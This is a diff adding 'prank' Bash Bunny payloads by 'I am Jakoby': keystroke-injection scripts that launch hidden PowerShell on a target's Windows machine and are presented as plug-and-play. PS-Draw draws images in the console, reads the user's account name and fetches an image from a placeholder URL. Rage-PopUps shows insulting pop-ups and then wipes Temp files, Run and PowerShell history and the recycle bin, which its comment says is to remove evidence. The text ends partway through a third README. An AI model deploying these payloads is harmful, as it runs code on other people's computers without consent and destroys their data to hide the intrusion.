# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\JumpScare.ps1')"
QUACK ENTER

BIN
payloads/library/prank/-BB-PS-Draw/Images/PS-Draw.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 20 KiB

1
payloads/library/prank/-BB-PS-Draw/Images/images Normal file
View File

@ -0,0 +1 @@
images will be stored here

BIN
payloads/library/prank/-BB-PS-Draw/Images/omg-ico.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 383 B

BIN
payloads/library/prank/-BB-PS-Draw/Images/ps-colors.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
payloads/library/prank/-BB-PS-Draw/Images/ps-hak5.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
payloads/library/prank/-BB-PS-Draw/Images/ps-omg.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

232
payloads/library/prank/-BB-PS-Draw/PS-Custom-Draw.ps1 Normal file
View File

@ -0,0 +1,232 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
.DESCRIPTION
This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
.SYNTAX
$col | PS-Draw
$hak5 | PS-Draw
$omg | PS-Draw
PS-Draw -Image $col
PS-Draw -Image $hak5
PS-Draw -Image $omg
#>
############################################################################################################################################################
$Colors = @{
1 = 'White'
2 = 'Black'
3 = 'DarkBlue'
4 = 'DarkGreen'
5 = 'DarkCyan'
6 = 'DarkRed'
7 = 'DarkMagenta'
8 = 'DarkYellow'
9 = 'Gray'
10 = 'DarkGray'
11 = 'Blue'
12 = 'Green'
13 = 'Cyan'
14 = 'Red'
15 = 'Magenta'
16 = 'Yellow'
}
#Show available colors
$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
@(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
@(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
@(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
@(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
@(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
@(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
@(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
@(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
@(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
@(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
@(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
@(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
@(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
@(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
@(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
@(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
@(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
# -------------------------------------------------------------------------------------------
function PS-Draw {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("I")]
[object[]]$Image
)
# if the data is sent through the pipeline, use $input to collect is as array
if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
#$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
cls
foreach ($row in $Image) {
foreach ($position in $row) {
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
Start-Sleep -m 10
}
Write-Host ""
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Get name to be used in greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out one of the images above
$col - to see the available colors you can use for a custom image
$hak5 - this will draw out the hak5 five logo
$omg - this will draw out the omg logo
#>
# -------------------------------------------------------------------------------------------
# Call function with one of the arrays listed above to generate an image
$hak5 | PS-Draw

201
payloads/library/prank/-BB-PS-Draw/PS-Draw.ps1 Normal file
View File

@ -0,0 +1,201 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $BackGround
.DESCRIPTION
This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
that can be used in powershell. Finally that image will be drawn in a powershell window.
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
############################################################################################################################################################
Function PS-Draw
{
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
[Switch] $ToASCII
)
Begin
{
[void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
# Console Colors and their Hexadecimal values
$Colors = @{
'FFFFFFFF' = 'White'
'FF000000' = 'Black'
'FF000080' = 'DarkBlue'
'FF008000' = 'DarkGreen'
'FF008080' = 'DarkCyan'
'FF800000' = 'DarkRed'
'FF800080' = 'DarkMagenta'
'FF808000' = 'DarkYellow'
'FFC0C0C0' = 'Gray'
'FF808080' = 'DarkGray'
'FF0000FF' = 'Blue'
'FF00FF00' = 'Green'
'FF00FFFF' = 'Cyan'
'FFFF0000' = 'Red'
'FFFF00FF' = 'Magenta'
'FFFFFF00' = 'Yellow'
}
# Algorithm to calculate closest Console color (Only 16) to a color of Pixel
Function Get-ClosestConsoleColor($PixelColor)
{
($(foreach ($item in $Colors.Keys) {
[pscustomobject]@{
'Color' = $Item
'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
}
}) | Sort-Object Diff)[0].color
}
}
Process
{
Foreach($item in $Path)
{
#Convert Image to BitMap
$BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
Foreach($y in (1..($BitMap.Height-1)))
{
Foreach($x in (1..($BitMap.Width-1)))
{
$Pixel = $BitMap.GetPixel($X,$Y)
$BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
If($ToASCII) # Condition to check ToASCII switch
{
Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
}
else
{
Write-Host " " -NoNewline -BackgroundColor $BackGround
}
}
Write-Host '' # Blank write-host to Start the next row
}
}
}
end
{
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Download the image from wherever you are hosting it
iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
# -------------------------------------------------------------------------------------------
# Get name to use in the greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out your image
Replace the path below with the path of your image
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
# -------------------------------------------------------------------------------------------
# Call the function with the image you'd like to have drawn here
"$env:TMP\omg-ico.png" | PS-Draw

127
payloads/library/prank/-BB-PS-Draw/README.md Normal file
View File

@ -0,0 +1,127 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
## Description
These two programs use two different method to draw out images in the Powershell Window.
PS-Draw will convert an image you download into a BMP file estiamte the used colors based off the 16 available powershell colors
then draw your image out in the powershell window. This process is not exact and needed testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered microsoft account or the
UserName environment variable.
The script will then be paused until a mouse movement is detected at which time the pre selected image will be drawn out in the powershell window.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your Device
* A one liner command in the run box will execute the script on the bash bunny
* The image will be converted into a BMP file
* An algorithm will be used to find the closest matching colors available in the powershell window
* The image will be generated in the powershell window
This is an example of an image I used with the PS-Draw command
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/omg-ico.png?raw=true)
This is how the iamge is interpreted and drawn out
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/PS-Draw.jpg?raw=true)
* The PS-Custom-Draw operates a little differently
* One of the preconfigured arrays is piped into the command to generate an image
* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-colors.jpg?raw=true)
* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-omg.jpg?raw=true)
* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-PS-Draw/Images/ps-hak5.jpg?raw=true)
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-PS-Draw)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

32
payloads/library/prank/-BB-PS-Draw/payload.txt Normal file
View File

@ -0,0 +1,32 @@
# Title: PS-Draw
# Description: This payload is meant to draw images in your targets powershell console. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, STORAGE
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
# There are 2 different versions of this script, un-comment out the one you want to run
# This one will draw one of the custom images defined in the .ps1 file
QUACK STRING powershell -NoP -NonI ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\PS-Custom-Draw.ps1')"
# This one will draw an interpretation of an image you provide
#QUACK STRING powershell -NoP -NonI ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\PS-Draw.ps1')"
QUACK ENTER

94
payloads/library/prank/-BB-Rage-PopUps/README.md Normal file
View File

@ -0,0 +1,94 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Rage-PopUps
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Rage-PopUps)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

75
payloads/library/prank/-BB-Rage-PopUps/Rage-PopUps.ps1 Normal file
View File

@ -0,0 +1,75 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Rage-PopUps | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
.DESCRIPTION
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
for each one of them.
#>
#------------------------------------------------------------------------------------------------------------------------------------
Add-Type -AssemblyName System.Windows.Forms
# The number of times you want it to cycle through your list of questions
$cycles = 3
# List as many questions here as you like, it will cycke through all of them
$msgs = @(
"Are all scammers as dumb as you?"
"Is the pay worth being this big of a loser?"
"Do your parents know what you do for a living?"
"Does you boss know much much you suck at this job?"
)
for ($i=1; $i -le $cycles; $i++) {
Foreach ($msg in $msgs) {
[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

22
payloads/library/prank/-BB-Rage-PopUps/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Rage-PopUps
# Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Rage-PopUps.ps1')"
QUACK ENTER

96
payloads/library/prank/-BB-Wallpaper-Troll/README.md Normal file
View File

@ -0,0 +1,96 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Wallpaper-Troll
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
